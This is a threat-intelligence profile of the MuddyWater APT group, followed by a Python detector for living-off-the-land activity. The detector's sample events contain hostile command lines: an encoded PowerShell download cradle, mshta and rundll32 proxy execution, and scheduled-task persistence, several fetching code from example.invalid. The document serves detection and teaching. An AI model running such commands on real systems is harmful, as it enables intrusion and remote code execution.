MuddyWater is an APT group assessed to be affiliated with the Iranian government. It targets victims in the Middle East with in-memory, PowerShell-based payloads, in the family of attacks now described as "living off the land": the intrusion relies on interpreters and signed binaries already present on the host rather than dropping new executables, which keeps the detection profile and the on-disk forensic footprint low. The footprint is low on disk, not absent: process-creation and PowerShell script block logging still record the command lines and decoded scripts. The operators behind MuddyWater are likely espionage motivated. Although victims in Pakistan are the most numerous, the most actively pursued targets appear to be in Saudi Arabia, the UAE, and Iraq.
Alias:
MERCURY, Seedworm, Static Kitten, TEMP.Zagros, Earth Vetala
Motivation:
Information theft and espionage
Target Technologies:
Office Suites Software, Operating System, Web Application
Targeted Industries:
Aerospace, Aerospace & Defense, Agriculture, Capital Goods, Consumer Services, Defense, Energy, Energy Equipment & Services, Finance, Food, Gaming, High Tech IT Service Providers, Individuals, Media, Media & Entertainment, Military, NGO, Natural Resources, Oil and Gas, Politics, Telecommunication, Telecommunication Services, Transportation, Construction, Cryptocurrency, Education, Engineering, Government, Healthcare, and Metals
Targeted Countries:
Israel, Saudi Arabia, the United Arab Emirates, Iraq, Jordan, Lebanon, Qatar, Albania, Turkey, Austria, Ukraine, Russia, India, Azerbaijan, Pakistan, the United States of America, and Mali
Tools Used:
Secure Sockets Funneling (SSF), Remadmin, Chisel, Quarks PwDump, PowGoop (Downloader.Covic), Mimikatz, POWERSTATS, Thanos ransomware
CVEs Exploited:
CVE-2017-0199 (Microsoft Office/WordPad remote code execution via the OLE/HTA handler)
CVE-2017-11882 (Microsoft Office Equation Editor memory corruption)
CVE-2017-0144 (Windows SMBv1 remote code execution, EternalBlue)
CVE-2020-1472 (Netlogon elevation of privilege, Zerologon)
CVE-2017-17215 (Huawei HG532 router remote code execution)
CVE-2014-8361 (Realtek SDK miniigd UPnP SOAP command injection)
MITRE ATT&CK Techniques:
Reconnaissance: T1589.002 Gather Victim Identity Information: Email Addresses
Resource Development: T1583.006 Acquire Infrastructure: Web Services; T1588.002 Obtain Capabilities: Tool
Initial Access: T1190 Exploit Public-Facing Application; T1566.001 Spearphishing Attachment; T1566.002 Spearphishing Link
Execution: T1047 Windows Management Instrumentation; T1053.005 Scheduled Task; T1059.001 PowerShell; T1059.003 Windows Command Shell; T1059.005 Visual Basic; T1059.006 Python; T1059.007 JavaScript; T1203 Exploitation for Client Execution; T1204.001 User Execution: Malicious Link; T1204.002 User Execution: Malicious File; T1559.001 Inter-Process Communication: Component Object Model; T1559.002 Inter-Process Communication: Dynamic Data Exchange
Persistence: T1053.005 Scheduled Task; T1137.001 Office Template Macros; T1547.001 Registry Run Keys / Startup Folder; T1574.002 DLL Side-Loading
Privilege Escalation: T1053.005 Scheduled Task; T1547.001 Registry Run Keys / Startup Folder; T1548.002 Bypass User Account Control; T1574.002 DLL Side-Loading
Defense Evasion: T1027 Obfuscated Files or Information; T1027.003 Steganography; T1027.004 Compile After Delivery; T1036.005 Match Legitimate Name or Location; T1140 Deobfuscate/Decode Files or Information; T1218.003 System Binary Proxy Execution: CMSTP; T1218.005 System Binary Proxy Execution: Mshta; T1218.011 System Binary Proxy Execution: Rundll32; T1548.002 Bypass User Account Control; T1562.001 Disable or Modify Tools; T1574.002 DLL Side-Loading
Credential Access: T1003.001 OS Credential Dumping: LSASS Memory; T1003.004 OS Credential Dumping: LSA Secrets; T1003.005 OS Credential Dumping: Cached Domain Credentials; T1552.001 Unsecured Credentials: Credentials In Files; T1555 Credentials from Password Stores; T1555.003 Credentials from Web Browsers
Discovery: T1016 System Network Configuration Discovery; T1033 System Owner/User Discovery; T1049 System Network Connections Discovery; T1057 Process Discovery; T1082 System Information Discovery; T1083 File and Directory Discovery; T1087.002 Account Discovery: Domain Account; T1518 Software Discovery; T1518.001 Security Software Discovery
Lateral Movement: T1210 Exploitation of Remote Services
Collection: T1074.001 Local Data Staging; T1113 Screen Capture; T1560.001 Archive via Utility
Command and Control: T1071.001 Application Layer Protocol: Web Protocols; T1090.002 Proxy: External Proxy; T1102.002 Web Service: Bidirectional Communication; T1104 Multi-Stage Channels; T1105 Ingress Tool Transfer; T1132.001 Data Encoding: Standard Encoding; T1219 Remote Access Software; T1573.001 Encrypted Channel: Symmetric Cryptography
Exfiltration: T1041 Exfiltration Over C2 Channel
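The following detection sketch is an added example, not part of the original profile and not MuddyWater tooling or any vendor's code. It shows what the "living off the land" description above and the Execution / Defense Evasion / Persistence techniques in the table (T1059.001, T1027, T1218.003, T1218.005, T1218.011, T1053.005) look like in process-creation telemetry, and how an analyst would score such events. It assumes events arrive as (image, command line) pairs, as Sysmon Event ID 1 or Security 4688 would provide; the sample events, the host paths and the example.invalid URL are constructed for the demonstration.

```python
"""Added example (not MuddyWater tooling or the profile's own content): score
Windows process-creation events for living-off-the-land patterns - in-memory
PowerShell download cradles, -EncodedCommand payloads, and signed-binary proxy
execution via mshta, rundll32, cmstp and schtasks. Events are (image, command
line) pairs; the samples below are constructed, not real telemetry."""
import base64
import re

# Constructed download cradle, encoded the way powershell.exe expects (UTF-16LE, then base64).
CRADLE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_EVENTS = [
    ("powershell.exe", "powershell.exe -nop -w hidden -enc "
     + base64.b64encode(CRADLE_CMD.encode("utf-16le")).decode()),
    ("mshta.exe", "mshta.exe http://example.invalid/update.hta"),
    ("rundll32.exe", 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write()'),
    ("cmstp.exe", "cmstp.exe /ni /s C:\\Users\\Public\\update.inf"),
    ("schtasks.exe", 'schtasks.exe /create /sc minute /mo 5 /tn Update '
     '/tr "powershell -nop -w hidden -c iex (gc C:\\Users\\Public\\a.txt | Out-String)"'),
    ("powershell.exe", "powershell.exe -File C:\\Scripts\\inventory.ps1"),  # benign
    ("notepad.exe", "notepad.exe C:\\Users\\alice\\notes.txt"),              # benign
]

PS_RE = re.compile(r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b")
# Download-and-run primitives typical of in-memory PowerShell stagers.
CRADLE_RE = re.compile(
    r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|net\.webclient|"
    r"invoke-webrequest|iwr|invoke-restmethod|frombase64string)\b")
# Signed-binary proxy execution and scheduled-task persistence: (technique, regex over the command line).
LOLBIN_RULES = [
    ("T1218.005", re.compile(r"(?i)\bmshta(?:\.exe)?\b.*(?:https?:|javascript:|vbscript:)")),
    ("T1218.011", re.compile(r"(?i)\brundll32(?:\.exe)?\b.*(?:javascript:|vbscript:)")),
    ("T1218.003", re.compile(r"(?i)\bcmstp(?:\.exe)?\b.*\s/ni\b.*\.inf\b")),
    ("T1053.005", re.compile(r"(?i)\bschtasks(?:\.exe)?\b.*\s/create\b.*"
                             r"(?:powershell|pwsh|mshta|rundll32|cmstp|wscript|cscript)")),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none.

    powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
    -enc, ...), so the flag is matched by prefix rather than one fixed spelling.
    The payload is base64 of UTF-16LE text, not of ASCII."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        f = flag.lower()
        if f.startswith("-") and len(f) >= 2 and "-encodedcommand".startswith(f):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze(events):
    """Return one (technique_id, image, detail) tuple for every rule an event trips."""
    hits = []
    for image, cmdline in events:
        if PS_RE.search(cmdline):
            decoded = decode_encoded_command(cmdline)
            if decoded is not None:
                hits.append(("T1027", image, "encoded command decodes to: " + decoded))
            # Inspect the decoded payload as well; the cradle is usually hidden there.
            text = cmdline if decoded is None else cmdline + " " + decoded
            m = CRADLE_RE.search(text)
            if m:
                hits.append(("T1059.001", image, "download cradle primitive: " + m.group(0)))
        for technique, rule in LOLBIN_RULES:
            if rule.search(cmdline):
                hits.append((technique, image, "matched: " + cmdline[:80]))
    return hits


if __name__ == "__main__":
    for technique, image, detail in analyze(SAMPLE_EVENTS):
        print(f"{technique:<10} {image:<15} {detail}")
```

Two design points matter in practice. First, the encoded-command check decodes the payload before pattern matching, because a `-enc` blob defeats any rule written against the raw command line; the UTF-16LE step is what most ad hoc decoders get wrong. Second, the rules key on the command line rather than on the image name, since the same cradle appears inside a `schtasks /tr` argument or a `cmd /c` wrapper, where the parent image is not powershell.exe at all.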